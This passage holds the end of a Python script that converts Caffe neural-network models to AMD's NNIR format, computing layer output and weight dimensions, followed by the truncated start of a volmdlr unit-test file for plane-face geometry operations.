calculateTensorDims(layer_param, input_map, attribute_map):\n dimList = {}\n output_dims = [0, 0, 0, 0]\n inputs = list(input_map.keys())\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = convertV1LayerTypeToString(layer_param)\n else:\n layer_type = layer_param.type\n if(layer_type == \"Convolution\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n dilations = attribute_map[\"dilations\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n group = attribute_map[\"group\"]\n n,c,h,w = input_map[inputs[0]]\n output_dims[3] = ((int(w) + 2 * pads[0] - kernel_shape[0] - (kernel_shape[0] - 1) * (dilations[0] - 1))// strides[0]) + 1\n output_dims[2] = ((int(h) + 2 * pads[1] - kernel_shape[1] - (kernel_shape[1] - 1) * (dilations[1] - 1))// strides[1]) + 1\n output_dims[1] = layer_param.convolution_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], old_div(int(c),group), kernel_shape[1], kernel_shape[0]]\n dimList[\"weights\"] = weight_dims\n if (layer_param.convolution_param.bias_term):\n bias_dims = [weight_dims[0]]\n dimList[\"bias\"] = bias_dims\n\n elif (layer_type == \"Deconvolution\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n dilations = attribute_map[\"dilations\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n n,c,h,w = input_map[str(inputs[0])]\n\n output_dims[3] = strides[0] * (w - 1) + dilations[0] * (kernel_shape[0] - 1) + 1 - (2 * pads[0])\n output_dims[2] = strides[1] * (h - 1) + dilations[1] * (kernel_shape[1] - 1) + 1 - (2 * pads[1])\n output_dims[1] = layer_param.convolution_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], c, kernel_shape[1] , kernel_shape[0]]\n dimList[\"weights\"] = weight_dims\n if (layer_param.convolution_param.bias_term):\n bias_dims = [weight_dims[0]]\n dimList[\"bias\"] = bias_dims\n\n elif (layer_type == \"Pooling\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n n,c,h,w = input_map[str(inputs[0])]\n if (layer_param.pooling_param.global_pooling):\n kernel_shape[1] = h\n kernel_shape[0] = w\n pads[0] = 0\n pads[1] = 0\n strides[0] = 1\n strides[1] = 1\n\n output_dims[3] = int(math.ceil(float(w + 2 * pads[0] + strides[0] - kernel_shape[0])/strides[0]))\n output_dims[2] = int(math.ceil(float(h + 2 * pads[1] + strides[1] - kernel_shape[1])/strides[1]))\n if (pads[1] > 0):\n if (output_dims[2] - 1) * strides[1] >= (h + pads[1]):\n output_dims[2] = output_dims[2] - 1\n if (pads[0] > 0):\n if (output_dims[3] - 1) * strides[0] >= (w + pads[0]):\n output_dims[3] = output_dims[3] - 1\n output_dims[1] = c\n output_dims[0] = n\n\n elif (layer_type == \"InnerProduct\"):\n n,c,h,w = input_map[str(inputs[0])]\n output_dims[3] = 1\n output_dims[2] = 1\n output_dims[1] = layer_param.inner_product_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], c, h, w]\n dimList[\"weights\"] = weight_dims\n if (layer_param.inner_product_param.bias_term):\n dimList[\"bias\"] = [weight_dims[0]]\n\n elif (layer_type == \"Concat\"):\n inputs = list(input_map.keys())\n axis = attribute_map[\"axis\"]\n if axis == 1:\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n output_dims[1] += c\n n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[2] = h\n output_dims[3] = w\n elif axis == 2:\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n output_dims[2] += h\n n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[1] = c\n output_dims[3] = w\n\n elif (layer_type == \"Interp\"):\n inputs = list(input_map.keys())\n zoom_factor = attribute_map[\"zoom_factor\"]\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[1] = c\n output_dims[2] = h*zoom_factor\n output_dims[3] = w*zoom_factor\n #print('INFO: Found Layertype Interp with zoom '+ str(zoom_factor))\n\n elif (layer_type == \"BatchNorm\" or layer_param.type == \"Scale\"):\n output_dims[0], output_dims[1], output_dims[2], output_dims[3] = input_map[str(inputs[0])]\n if (len(layer_param.blobs) > 0):\n weight_dims = [output_dims[1]]\n dimList[\"weights\"] = weight_dims\n if (len(layer_param.blobs) > 1):\n bias_dims = [output_dims[1]]\n dimList[\"bias\"] = bias_dims\n \n elif (layer_type == \"Crop\"):\n inputs = list(input_map.keys())\n axis = attribute_map[\"axis\"]\n new_axis = 3 - axis\n\n for i in range(4):\n if (i <= new_axis):\n output_dims[i] = input_map[inputs[0]][i]\n else:\n output_dims[i] = input_map[inputs[1]][i]\n\n elif (layer_type == \"Permute\"):\n permute = layer_param.permute_param\n order = permute.order \n order = [int(i) for i in order]\n attribute_map[\"order\"] = order\n n,c,h,w = input_map[str(inputs[0])]\n if order == [0, 2, 3, 1]:\n output_dims[0] = n\n output_dims[1] = h\n output_dims[2] = w\n output_dims[3] = c\n if order == [0, 1, 2, 3]:\n output_dims[0] = n\n output_dims[1] = c\n output_dims[2] = h\n output_dims[3] = w\n\n elif (layer_type == \"PriorBox\"):\n n,c,h,w = input_map[str(inputs[0])]\n prior_box = layer_param.prior_box_param\n min_size = prior_box.min_size[0]\n attribute_map[\"min_size\"] = min_size\n max_size = prior_box.max_size[0] if prior_box.max_size else 0.0\n attribute_map[\"max_size\"] = max_size\n aspect_ratio = []\n for i in range(len(prior_box.aspect_ratio)):\n aspect_ratio.append(prior_box.aspect_ratio[i])\n attribute_map[\"aspect_ratio\"] = aspect_ratio\n flip = int(prior_box.flip)\n attribute_map[\"flip\"] = flip\n clip = int(prior_box.clip)\n attribute_map[\"clip\"] = clip\n variance = []\n for i in range(len(prior_box.variance)):\n variance.append(prior_box.variance[i])\n attribute_map[\"variance\"] = variance\n offset = float(prior_box.offset)\n attribute_map[\"prior_offset\"] = offset\n dim = 1 #for min_size\n dim += len(aspect_ratio)\n if max_size > 0:\n dim += 1\n if flip == 1:\n dim += len(aspect_ratio)\n output_dims[0] = 1\n output_dims[1] = 2 #for mean and variance values\n output_dims[2] = h * w * dim * 4 \n output_dims[3] = 1\n \n elif (layer_type == \"Flatten\"):\n flatten = layer_param.flatten_param \n axis = flatten.axis\n attribute_map[\"axis\"] = axis\n n,c,h,w = input_map[str(inputs[0])]\n output_dims[0] = n\n output_dims[1] = c*h*w\n output_dims[2] = 1\n output_dims[3] = 1\n elif (layer_type == \"Reshape\"):\n shape = attribute_map[\"shape\"]\n input_shape = input_map[str(inputs[0])]\n input_shape = [int(z) for z in input_shape]\n \n icount = 1\n ocount = 1\n\n for dim in range(len(input_shape)):\n icount *= input_shape[dim]\n for dim in range(len(shape)):\n if shape[dim] > 0:\n output_dims[dim] = shape[dim]\n ocount *= output_dims[dim]\n elif shape[dim] == 0:\n output_dims[dim] = input_shape[dim]\n ocount *= output_dims[dim]\n \n \n for dim in range(len(shape)):\n if shape[dim] == -1:\n output_dims[dim] = icount// ocount\n ocount *= output_dims[dim]\n\n for i in range(len(output_dims)): \n if output_dims[i] == 0: \n output_dims[i] = 1\n elif (layer_param.type == \"DetectionOutput\"):\n output_dims[0] = 1\n output_dims[1] = 1\n output_dims[2] = 1\n output_dims[3] = 7\n else:\n output_dims[0],output_dims[1],output_dims[2],output_dims[3] = input_map[str(inputs[0])]\n\n dimList[\"output\"] = output_dims\n\n return dimList\n\n\ndef convertV1LayerTypeToString(layer_param):\n EnumDescriptor = list(caffe_pb2.V1LayerParameter.LayerType.items())\n for item in EnumDescriptor:\n if layer_param.type == item[1]:\n layer_type_V1 = item[0]\n if layer_type_V1 == \"CONCAT\":\n layer_type = \"Concat\"\n elif layer_type_V1 == \"CONVOLUTION\":\n layer_type = \"Convolution\"\n elif layer_type_V1 == \"DATA\":\n layer_type = \"Data\"\n elif layer_type_V1 == \"DECONVOLUTION\":\n layer_type = \"Deconvolution\"\n elif layer_type_V1 == \"DROPOUT\":\n layer_type = \"Dropout\" \n elif layer_type_V1 == \"ELTWISE\":\n layer_type = \"Eltwise\"\n elif layer_type_V1 == \"FLATTEN\":\n layer_type = \"Flatten\"\n elif layer_type_V1 == \"IMAGE_DATA\":\n layer_type = \"ImageData\"\n elif layer_type_V1 == \"INNER_PRODUCT\":\n layer_type = \"InnerProduct\" \n elif layer_type_V1 == \"LRN\":\n layer_type = \"LRN\"\n elif layer_type_V1 == \"POOLING\":\n layer_type = \"Pooling\" \n elif layer_type_V1 == \"RELU\":\n layer_type = \"ReLU\" \n elif layer_type_V1 == \"SOFTMAX\":\n layer_type = \"Softmax\" \n elif layer_type_V1 == \"SOFTMAX_LOSS\":\n layer_type = \"SoftmaxWithLoss\"\n elif layer_type_V1 == \"SPLIT\":\n layer_type = \"Split\"\n elif layer_type_V1 == \"SLICE\":\n layer_type = \"Slice\"\n elif layer_type_V1 == \"SCALE\":\n layer_type = \"Scale\"\n else:\n layer_type = \"Unknown V1 Layer Type\"\n return layer_type\n\n# extract caffe node information into ir nodes.\ndef extractCaffeNodeInfo(net_parameter, graph, inputsInfo, verbose):\n inputOutputMap = collections.OrderedDict()\n dropoutLayerMap = {}\n splitLayerMap = {}\n outputNameAliasMap = {}\n inputsMap = {}\n outputsMap = {}\n count = 0\n _output_name = {}\n\n if (len(net_parameter.layer) == 0):\n layers = net_parameter.layers\n else:\n layers = net_parameter.layer\n\n for i in range(len(layers)):\n layer_param = layers[i]\n layer_name = caffe_name_to_ir_name(str(layer_param.name))\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = convertV1LayerTypeToString(layer_param)\n else:\n layer_type = str(layer_param.type)\n \n inputs = layer_param.bottom\n outputs = layer_param.top\n # ignoring the input/data layer as input is already obtained in previous step.\n if (layer_type == \"Data\" or layer_type == \"ImageData\" or layer_type == \"Input\"):\n continue\n # find out all the outputs and store names\n for k in range(len(layer_param.bottom)):\n if layer_param.bottom[k] in _output_name:\n _output_name[layer_param.bottom[k]]['count'] = _output_name[layer_param.bottom[k]]['count']+1\n else:\n _output_name[layer_param.bottom[k]] = {'count':0}\n for k in range(len(layer_param.top)):\n if layer_param.top[k] in _output_name:\n _output_name[layer_param.top[k]]['count'] = _output_name[layer_param.top[k]]['count']+1\n else:\n _output_name[layer_param.top[k]] = {'count':0, 'name':layer_name}\n\n # dropout layer is copy layer in inference, hence aliasing the input for dropout layer for next layer.\n if (layer_type == \"Dropout\"):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n if in_name in outputNameAliasMap:\n in_name = outputNameAliasMap[in_name]\n dropoutLayerMap[caffe_name_to_ir_name(str(outputs[0]))] = in_name\n continue\n\n # split layer optimization.\n if (layer_type == \"Split\"):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n if (in_name in outputNameAliasMap):\n in_name = outputNameAliasMap[in_name]\n for k in range(len(outputs)):\n splitLayerMap[caffe_name_to_ir_name(outputs[k])] = in_name\n continue\n\n layer_info_map = {}\n input_info_map = collections.OrderedDict()\n output_info_map = collections.OrderedDict()\n layer_info_map[\"layer_name\"] = layer_name\n if layer_type in caffe2ir_op_type:\n layer_info_map[\"layer_type\"] = caffe2ir_op_type[layer_type]\n elif layer_type == \"Pooling\":\n pool_type = layer_param.pooling_param.pool\n layer_info_map[\"layer_type\"] = \"max_pool\" if (pool_type == caffe_pb2.PoolingParameter.MAX) else \"avg_pool\"\n\n #fusing scale layer to batchnorm layer.\n #adding scale weights and biases into the batchnorm, else fusing scale to mul or muladd operator.\n elif layer_type == \"Scale\":\n scale_fused = 0\n if (verbose):\n print (\"Info: Found scale layer \" + str(layer_name))\n if (count > 0 and (count < len(layers))):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n for j in range(count-1, 0, -1):\n prev_layer_info = inputOutputMap[j]\n prev_layer_type = prev_layer_info[\"layer_type\"]\n prev_output_map = prev_layer_info[\"outputs\"]\n if (verbose):\n print(\"prev_type \" + str(prev_layer_type) + \" \" + str(in_name) + \" \" + str(prev_output_map))\n if (prev_layer_type == \"batch_norm\" and ((in_name in prev_output_map) or (in_name in outputNameAliasMap))):\n modified_out_info_map = {}\n scale_weights_map = {}\n scale_bias_map = {}\n extractBinary(layer_param, graph, verbose)\n prev_input_map = prev_layer_info[\"inputs\"]\n prev_attribute_map = prev_layer_info[\"attributes\"]\n dimList = calculateTensorDims(layer_param, prev_input_map, prev_attribute_map)\n modified_out_info_map[layer_name] = dimList[\"output\"]\n outputsMap.update(modified_out_info_map)\n prev_layer_info[\"outputs\"] = modified_out_info_map\n if (\"weights\" in dimList):\n scale_weights = layer_name + \"_w\"\n scale_weights_map[scale_weights] = dimList[\"weights\"]\n prev_layer_info[\"scale_weights\"] = scale_weights_map\n graph.addVariable(caffe_blob_to_ir_tensor(scale_weights, \"F032\", dimList[\"weights\"]))\n if (\"bias\" in dimList):\n scale_bias = layer_name + \"_b\"\n scale_bias_map[scale_bias] = dimList[\"bias\"]\n prev_layer_info[\"scale_bias\"] = scale_bias_map\n graph.addVariable(caffe_blob_to_ir_tensor(scale_bias, \"F032\", dimList[\"bias\"]))\n if(layer_name != caffe_name_to_ir_name(str(outputs[0]))):\n outputNameAliasMap[caffe_name_to_ir_name(str(outputs[0]))] = layer_name\n prev_layer_name = prev_layer_info[\"layer_name\"]\n prev_layer_info[\"layer_name\"] = layer_name\n inputOutputMap[j] = prev_layer_info\n if (verbose):\n print (prev_layer_info)\n node = caffe_node_to_ir_node(prev_layer_info[\"layer_type\"], prev_layer_info)\n graph.addNode(node)\n if (verbose):\n print (\"OK: fusing scale\" + str(layer_name) + \"to batch_norm\" + str(prev_layer_name))\n scale_fused = 1\n break\n if scale_fused == 0:\n scale_layer_type = 'mul' if len(layer_param.blobs) == 1 else 'muladd'\n if (verbose):\n print (\"OK: Fusing scale to : \" + scale_layer_type)\n layer_info_map[\"layer_type\"] = scale_layer_type\n continue\n else:\n print (\"ERROR: caffe operation %s is not supported yet.\" % (layer_type))\n sys.exit(1)\n\n # extract attributes of the layer.\n attribute_map = extractCaffeAttrInfo(layer_param)\n layer_info_map[\"attributes\"] = attribute_map\n if (layer_type == \"ReLU\" and attribute_map[\"alpha\"] != 0):\n layer_info_map[\"layer_type\"] = \"leaky_relu\"\n\n #extract input information.\n if (count == 0):\n for k in range(len(inputs)):\n in_name = caffe_name_to_ir_name(str(inputs[k]))\n if str(inputs[k]) in inputsInfo:\n input_info_map[in_name] = inputsInfo[in_name]\n elif str(inputs[k]) in splitLayerMap:\n inp_name = splitLayerMap[in_name]\n input_info_map[inp_name] = inputsInfo[inp_name]\n else:\n print (\"ERROR: unable to get the input dimensions for the layer %s\" % (layer_name))\n sys.exit(1)\n else:\n for k in range(len(inputs)):\n previous_layer_info = inputOutputMap[count - 1]\n prevOutMap = previous_layer_info[\"outputs\"]\n input_name = str(caffe_name_to_ir_name(str(inputs[k])))\n\n # changing the name of the input based on alias name for top==bottom in previous layer.\n if (input_name in outputNameAliasMap):\n input_name = outputNameAliasMap[input_name]\n\n if (input_name in splitLayerMap):\n input_name = splitLayerMap[input_name]\n\n if (input_name in dropoutLayerMap):\n input_name = dropoutLayerMap[input_name]\n\n # get the input dimensions.\n if input_name in prevOutMap:\n input_info_map[input_name] = prevOutMap[input_name]\n elif input_name in outputsMap:\n input_info_map[input_name] = outputsMap[input_name]\n elif input_name in inputsMap:\n input_info_map[input_name] = inputsMap[input_name]\n elif input_name in dropoutLayerMap:\n input_info_map[dropoutLayerMap[input_name]] = outputsMap[dropoutLayerMap[input_name]]\n elif input_name in splitLayerMap:\n input_info_map[splitLayerMap[input_name]] = prevOutMap[splitLayerMap[input_name]]\n elif input_name in inputsInfo:\n input_info_map[input_name] = inputsInfo[input_name]\n else:\n if (((layer_type == \"Softmax\") or (layer_type == \"SoftmaxWithLoss\")) and k != 0):\n break\n elif input_name in outputNameAliasMap:\n input_info_map[outputNameAliasMap[input_name]] = prevOutMap[outputNameAliasMap[input_name]]\n else:\n print (\"ERROR: unknown dimensions for %s in the layer %s \" % (input_name, layer_name))\n sys.exit(1)\n\n inputsMap.update(input_info_map)\n #calculate output,weight and bias dimensions.\n dimList = calculateTensorDims(layer_param, input_info_map, attribute_map)\n if (len(outputs) > 0) and caffe_name_to_ir_name(str(layer_name)) != caffe_name_to_ir_name(str(outputs[0])):\n outputNameAliasMap[caffe_name_to_ir_name(str(outputs[0]))] = caffe_name_to_ir_name(str(layer_name))\n\n output_info_map[layer_name] = dimList[\"output\"]\n outputsMap.update(output_info_map)\n\n # add inputs and outputs to layer info.\n layer_info_map[\"inputs\"] = input_info_map\n layer_info_map[\"outputs\"] = output_info_map\n\n #add weights and biases info if present into the layer info.\n extractBinary(layer_param, graph, verbose)\n weights_map = {}\n bias_map = {}\n if \"weights\" in dimList:\n weights = layer_name + '_w'\n weight_dims = dimList[\"weights\"]\n weights_map[weights] = weight_dims\n graph.addVariable(caffe_blob_to_ir_tensor(weights, \"F032\", weight_dims))\n layer_info_map[\"weights\"] = weights_map\n if \"bias\" in dimList:\n biases = layer_name + \"_b\"\n bias_dims = dimList[\"bias\"]\n bias_map[biases] = bias_dims\n graph.addVariable(caffe_blob_to_ir_tensor(biases, \"F032\", bias_dims))\n layer_info_map[\"biases\"] = bias_map\n\n inputOutputMap[count] = layer_info_map\n count += 1\n if(layer_type == \"BatchNorm\" and (i < len(layers) - 1)):\n for j in range(i+1, len(layers)-1):\n next_layer_param = layers[j]\n if(next_layer_param.type == \"Scale\" and str(next_layer_param.bottom[0]) == str(outputs[0])):\n #scaleLayerInputMap[caffe_name_to_ir_name(str(next_layer_param.name))] = caffe_name_to_ir_name(str(outputs[0]))\n break\n continue\n\n if (verbose):\n print (layer_info_map)\n node = caffe_node_to_ir_node(layer_info_map[\"layer_type\"], layer_info_map) \n graph.addNode(node)\n #add all outputs to graph \n output_name = []\n for i in _output_name:\n if 'name' in _output_name[i] and _output_name[i]['count'] == 0:\n output_name.append(_output_name[i]['name']) \n\n return inputOutputMap, output_name\n\n\n# convert caffe graph to ir graph.\ndef caffe_graph_to_ir_graph(net_parameter, input_dims, verbose):\n graph = ir.IrGraph(False)\n inputMap = extractInput(net_parameter, graph, input_dims)\n inputOutputMap, output_name = extractCaffeNodeInfo(net_parameter, graph, inputMap, verbose)\n outputList = extractOutput(graph, inputOutputMap, output_name, verbose)\n graph.updateLocals()\n return graph\n\n# convert caffe representation to ir representation.\ndef caffe2ir(net_parameter, input_dims, outputFolder, verbose,node_type_append):\n graph = caffe_graph_to_ir_graph(net_parameter, input_dims, verbose)\n graph.toFile(outputFolder,node_type_append)\n print (\"OK: graph successfully formed.\")\n\ndef main():\n if len(sys.argv) < 4:\n print (\"Usage : python caffe_to_nnir.py --input-dims n,c,h,w [--verbose 0|1] [--node_type_append 0/1 (optional: appends node type to output tensor name)]\")\n sys.exit(1)\n caffeFileName = sys.argv[1]\n outputFolder = sys.argv[2]\n input_dims = sys.argv[4].split(',')\n\n verbose = 0\n \"\"\"if(len(sys.argv) > 5):\n verbose = 1 if int(sys.argv[6]) else 0\n if (verbose):\n print (\"OK: verbose enabled.\")\n \"\"\"\n #appends node type to output tensor name.\n node_type_append = 0\n pos = 5\n while pos < len(sys.argv) and len(sys.argv) >= 5 and sys.argv[pos][:2] == '--':\n if sys.argv[pos] == '--node_type_append':\n node_type_append = int(sys.argv[pos+1])\n pos = pos + 2\n elif sys.argv[pos] == '--verbose':\n verbose = int(sys.argv[pos+1])\n pos = pos + 2\n if (verbose):\n print (\"OK: verbose enabled.\")\n print (\"OK: loading caffemodel from %s ...\" % (caffeFileName))\n net_parameter = caffe_pb2.NetParameter()\n if not os.path.isfile(caffeFileName):\n print (\"ERROR: unable to open : \" + caffeFileName)\n sys.exit(1)\n\n if (verbose):\n print (\"parsing the caffemodel from : \" + str(caffeFileName))\n net_parameter.ParseFromString(open(caffeFileName, 'rb').read())\n print (\"OK: caffemodel read successful\")\n print (\"converting to AMD NNIR format in %s folder ... \" % (outputFolder))\n if (verbose):\n print (\"input parameters obtained are : \" + str(input_dims[0]) + \" \" + str(input_dims[1]) + \" \" + str(input_dims[2]) + \" \" + str(input_dims[3]))\n\n caffe2ir(net_parameter, input_dims, outputFolder, verbose, node_type_append)\n\nif __name__ == '__main__':\n main()\n","repo_name":"GPUOpen-ProfessionalCompute-Libraries/MIVisionX","sub_path":"model_compiler/python/caffe_to_nnir.py","file_name":"caffe_to_nnir.py","file_ext":"py","file_size_in_byte":38772,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"34"} +{"seq_id":"27736184603","text":"\"\"\"\nTests for places faces\n\"\"\"\nimport math\nimport os\nimport unittest\n\nimport dessia_common.core\nimport dessia_common.core as dc\n\nimport volmdlr\nfrom volmdlr import edges, wires, faces, surfaces, curves\n\n\nfolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"objects_planeface_tests\")\n\n\nclass TestPlaneFace3D(unittest.TestCase):\n face_with_3holes = dc.DessiaObject.load_from_file(os.path.join(folder, 'face_with_3holes.json'))\n face = dc.DessiaObject.load_from_file(os.path.join(folder,\n 'face_to_cut_the_one_with_3holes.json'))\n plane_face_cylindricalface_intersec = dc.DessiaObject.load_from_file(\n os.path.join(folder, 'plane_face_cylindrical_face_intersec.json'))\n\n def test_area(self):\n self.assertAlmostEqual(self.face_with_3holes.area(), 0.12160000)\n\n def test_face_inside(self):\n face2 = self.face.frame_mapping(volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0), volmdlr.Vector3D(0.5, 0, 0),\n volmdlr.Vector3D(0, 0.5, 0), volmdlr.Vector3D(0, 0, 0.5)), 'old')\n self.assertEqual(self.face.face_inside(face2), True)\n self.assertEqual(face2.face_inside(self.face), False)\n face1, face2 = dc.DessiaObject.load_from_file(os.path.join(folder, 'test_face_inside.json')).primitives\n self.assertTrue(face1.face_inside(face2))\n face1, face2 = dc.DessiaObject.load_from_file(os.path.join(folder, 'test_face3_face_inside.json')).primitives\n self.assertFalse(face1.face_inside(face2))\n\n def test_face_intersections_with_holes(self):\n face_intersections = self.face.face_intersections(self.face_with_3holes)\n self.assertEqual(len(face_intersections), 4)\n\n def test_line_intersections(self):\n line_inside_hole = curves.Line3D(volmdlr.Point3D(0.1, 0.0, -.3), volmdlr.Point3D(-0.1, 0.0, 0.3))\n line_inside_face = curves.Line3D(volmdlr.Point3D(-0.05, 0.0, -.3), volmdlr.Point3D(-0.1, 0.0, 0.3))\n self.assertEqual([], self.face_with_3holes.line_intersections(line_inside_hole))\n self.assertEqual(1, len(self.face_with_3holes.line_intersections(line_inside_face)))\n\n def test_divide_face(self):\n face_intersections = self.face.face_intersections(self.face_with_3holes)\n cutting_contours = self.face_with_3holes.get_face_cutting_contours(\n {(self.face, self.face_with_3holes): face_intersections})\n new_faces = self.face_with_3holes.divide_face(cutting_contours)\n self.assertEqual(len(new_faces), 2)\n cutting_contour = wires.Wire2D.from_points([\n volmdlr.Point2D(0.5, 1.), volmdlr.Point2D(0.5, 0.75),\n volmdlr.Point2D(1, 0.75), volmdlr.Point2D(1, 1), volmdlr.Point2D(1.25, 1),\n volmdlr.Point2D(1.25, 1.5), volmdlr.Point2D(1, 1.5)\n ])\n face_tobe_divided = dc.DessiaObject.load_from_file(os.path.join(folder, 'face_tobe_divided.json'))\n divided_faces = face_tobe_divided.divide_face([cutting_contour])\n self.assertEqual(len(divided_faces), 4)\n expected_areas = [0.125, 1.4320458460875176, 0.05704584608751772, 0.125]\n for i, face in enumerate(divided_faces):\n self.assertAlmostEqual(expected_areas[i], face.area())\n source_folder = os.path.join(folder, 'test_planeface_divide_face_json_files')\n expected_faces_areas = [[0.0055788043593624215, 0.23430978309161565, 0.005578804359415823, 0.0948396741089057],\n [0.0855613934860544, 0.032085522557644186, 0.01069517418574345],\n [0.002005345159845676, 0.002005345159820638, 0.0033422419331328506,\n 0.0006684483866419249], [0.3403070659192998, 0.005578804359415823],\n [0.0427806967433878, 0.010695174185850198, 0.08556139348605463],\n [0.07754001284661505, 0.002673793546460905]]\n file_names = ['test_face_divide_face5.json', 'test_face_divide_face2.json',\n 'test_planeface3d_divide_face.json', 'test_face_divide_face3.json', 'test_face_divide_face.json',\n 'test_face_divide_face6.json']\n faces_areas = []\n for filename in file_names:\n file_path = os.path.join(source_folder, filename)\n obj = dc.DessiaObject.load_from_file(file_path)\n face = obj.primitives[0]\n list_cutting_contours = obj.primitives[1:]\n divide_faces = face.divide_face(list_cutting_contours)\n areas = [face.area() for face in divide_faces]\n faces_areas.append(areas)\n for solution, expected_solution in zip(faces_areas, expected_faces_areas):\n self.assertEqual(len(solution), len(expected_solution))\n for solution_area, expected_solution_area in zip(solution, expected_solution):\n self.assertAlmostEqual(solution_area, expected_solution_area)\n\n def test_set_operations_new_faces(self):\n volumemodel = dessia_common.core.DessiaObject.load_from_file(\n os.path.join(folder, 'test_set_operations_new_faces.json'))\n plane_face, cutting_contours3d = volumemodel.primitives[0], volumemodel.primitives[1:]\n divide_face = plane_face.set_operations_new_faces({(plane_face, plane_face): cutting_contours3d})\n divide_face = sorted(divide_face, key=lambda face: face.area())\n self.assertEqual(len(divide_face), 7)\n expected_areas = [0.05000000000000002, 0.25, 0.4375, 0.5, 1.0621681469282045, 1.29875, 2.4002627208849607]\n areas = [f.area() for f in divide_face]\n for area, expected_area in zip(areas, expected_areas):\n self.assertAlmostEqual(area, expected_area, 6)\n\n def test_cylindricalface_intersections(self):\n R = 0.15\n cylindricalsurface = surfaces.CylindricalSurface3D(volmdlr.OXYZ, R)\n face = faces.CylindricalFace3D.from_surface_rectangular_cut(cylindricalsurface, 0, volmdlr.TWO_PI, -.25, .25)\n \"\"\" ========== CIRCLE3D =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 2)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 1)\n self.assertIsInstance(face_intersections[0].primitives[0], edges.FullArc3D)\n self.assertEqual(face_intersections[0].primitives[0].circle.center, volmdlr.O3D)\n self.assertEqual(face_intersections[0].primitives[0].circle.radius, 0.15)\n \"\"\" ========== FULL ELLIPSE3D =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 4)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 1)\n self.assertIsInstance(face_intersections[0].primitives[0], edges.FullArcEllipse3D)\n self.assertEqual(face_intersections[0].primitives[0].ellipse.center, volmdlr.O3D)\n self.assertAlmostEqual(face_intersections[0].primitives[0].ellipse.major_axis, 0.21213203435596426)\n self.assertTrue(face_intersections[0].primitives[0].ellipse.major_dir.is_close(\n volmdlr.Vector3D(0, -0.7071067811865475, 0.7071067811865475)))\n \"\"\" ========== THREE ARC ELLIPSES =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 7)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 3)\n for inter in face_intersections:\n self.assertIsInstance(inter.primitives[0], edges.ArcEllipse3D)\n self.assertEqual(face_intersections[0].primitives[0].ellipse.center, volmdlr.O3D)\n self.assertTrue(face_intersections[0].primitives[0].ellipse.major_dir.is_close(volmdlr.Point3D(\n 2.6567716615652136e-17, -0.4338837391180807, 0.9009688679021675)))\n self.assertAlmostEqual(face_intersections[0].primitives[0].ellipse.major_axis, 0.3457147306439571)\n list_expected_points = [[volmdlr.Point3D(0.08947272158306664, -0.12039365470206077, 0.25),\n volmdlr.Point3D(0.136637076048, -0.061889493851, 0.128514858204),\n volmdlr.Point3D(0.15, -0.0, 0.0)],\n [volmdlr.Point3D(0.15, -0.0, 0.0),\n volmdlr.Point3D(0.136637075473, 0.06188949512, -0.128514860839),\n volmdlr.Point3D(0.08947272158306664, 0.12039365470206077, -0.25)],\n [volmdlr.Point3D(-0.08947272158306664, 0.12039365470206077, -0.25),\n volmdlr.Point3D(-0.15, 0, 0),\n volmdlr.Point3D(-0.08947272158306664, -0.12039365470206077, 0.25)]]\n for expected_points, wire in zip(list_expected_points, face_intersections):\n arcellipse = wire.primitives[0]\n self.assertTrue(expected_points[0].is_close(arcellipse.start))\n self.assertTrue(expected_points[1].is_close(arcellipse.middle_point()))\n self.assertTrue(expected_points[2].is_close(arcellipse.end))\n \"\"\" ========== TWO PARALLEL LINES =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(face_intersections[0].primitives[0], edges.LineSegment3D(volmdlr.Point3D(0.15, 0.0, -0.25),\n volmdlr.Point3D(0.15, 0.0, 0.25)))\n self.assertEqual(face_intersections[1].primitives[0], edges.LineSegment3D(volmdlr.Point3D(-0.15, 0.0, -0.25),\n volmdlr.Point3D(-0.15, 0.0, 0.25)))\n \"\"\" ========== ONE LINE =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.translation(R * volmdlr.Y3D)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(face_intersections[0].primitives[0], edges.LineSegment3D(volmdlr.Point3D(0.0, 0.15, -0.25),\n volmdlr.Point3D(0.0, 0.15, 0.25)))\n\n def test_conical_face_intersections(self):\n def get_face(plane, x1=-1, x2=1, y1=-1, y2=1):\n return faces.PlaneFace3D.from_surface_rectangular_cut(plane, x1, x2, y1, y2)\n conical_surface = surfaces.ConicalSurface3D(volmdlr.OXYZ, math.pi / 6)\n 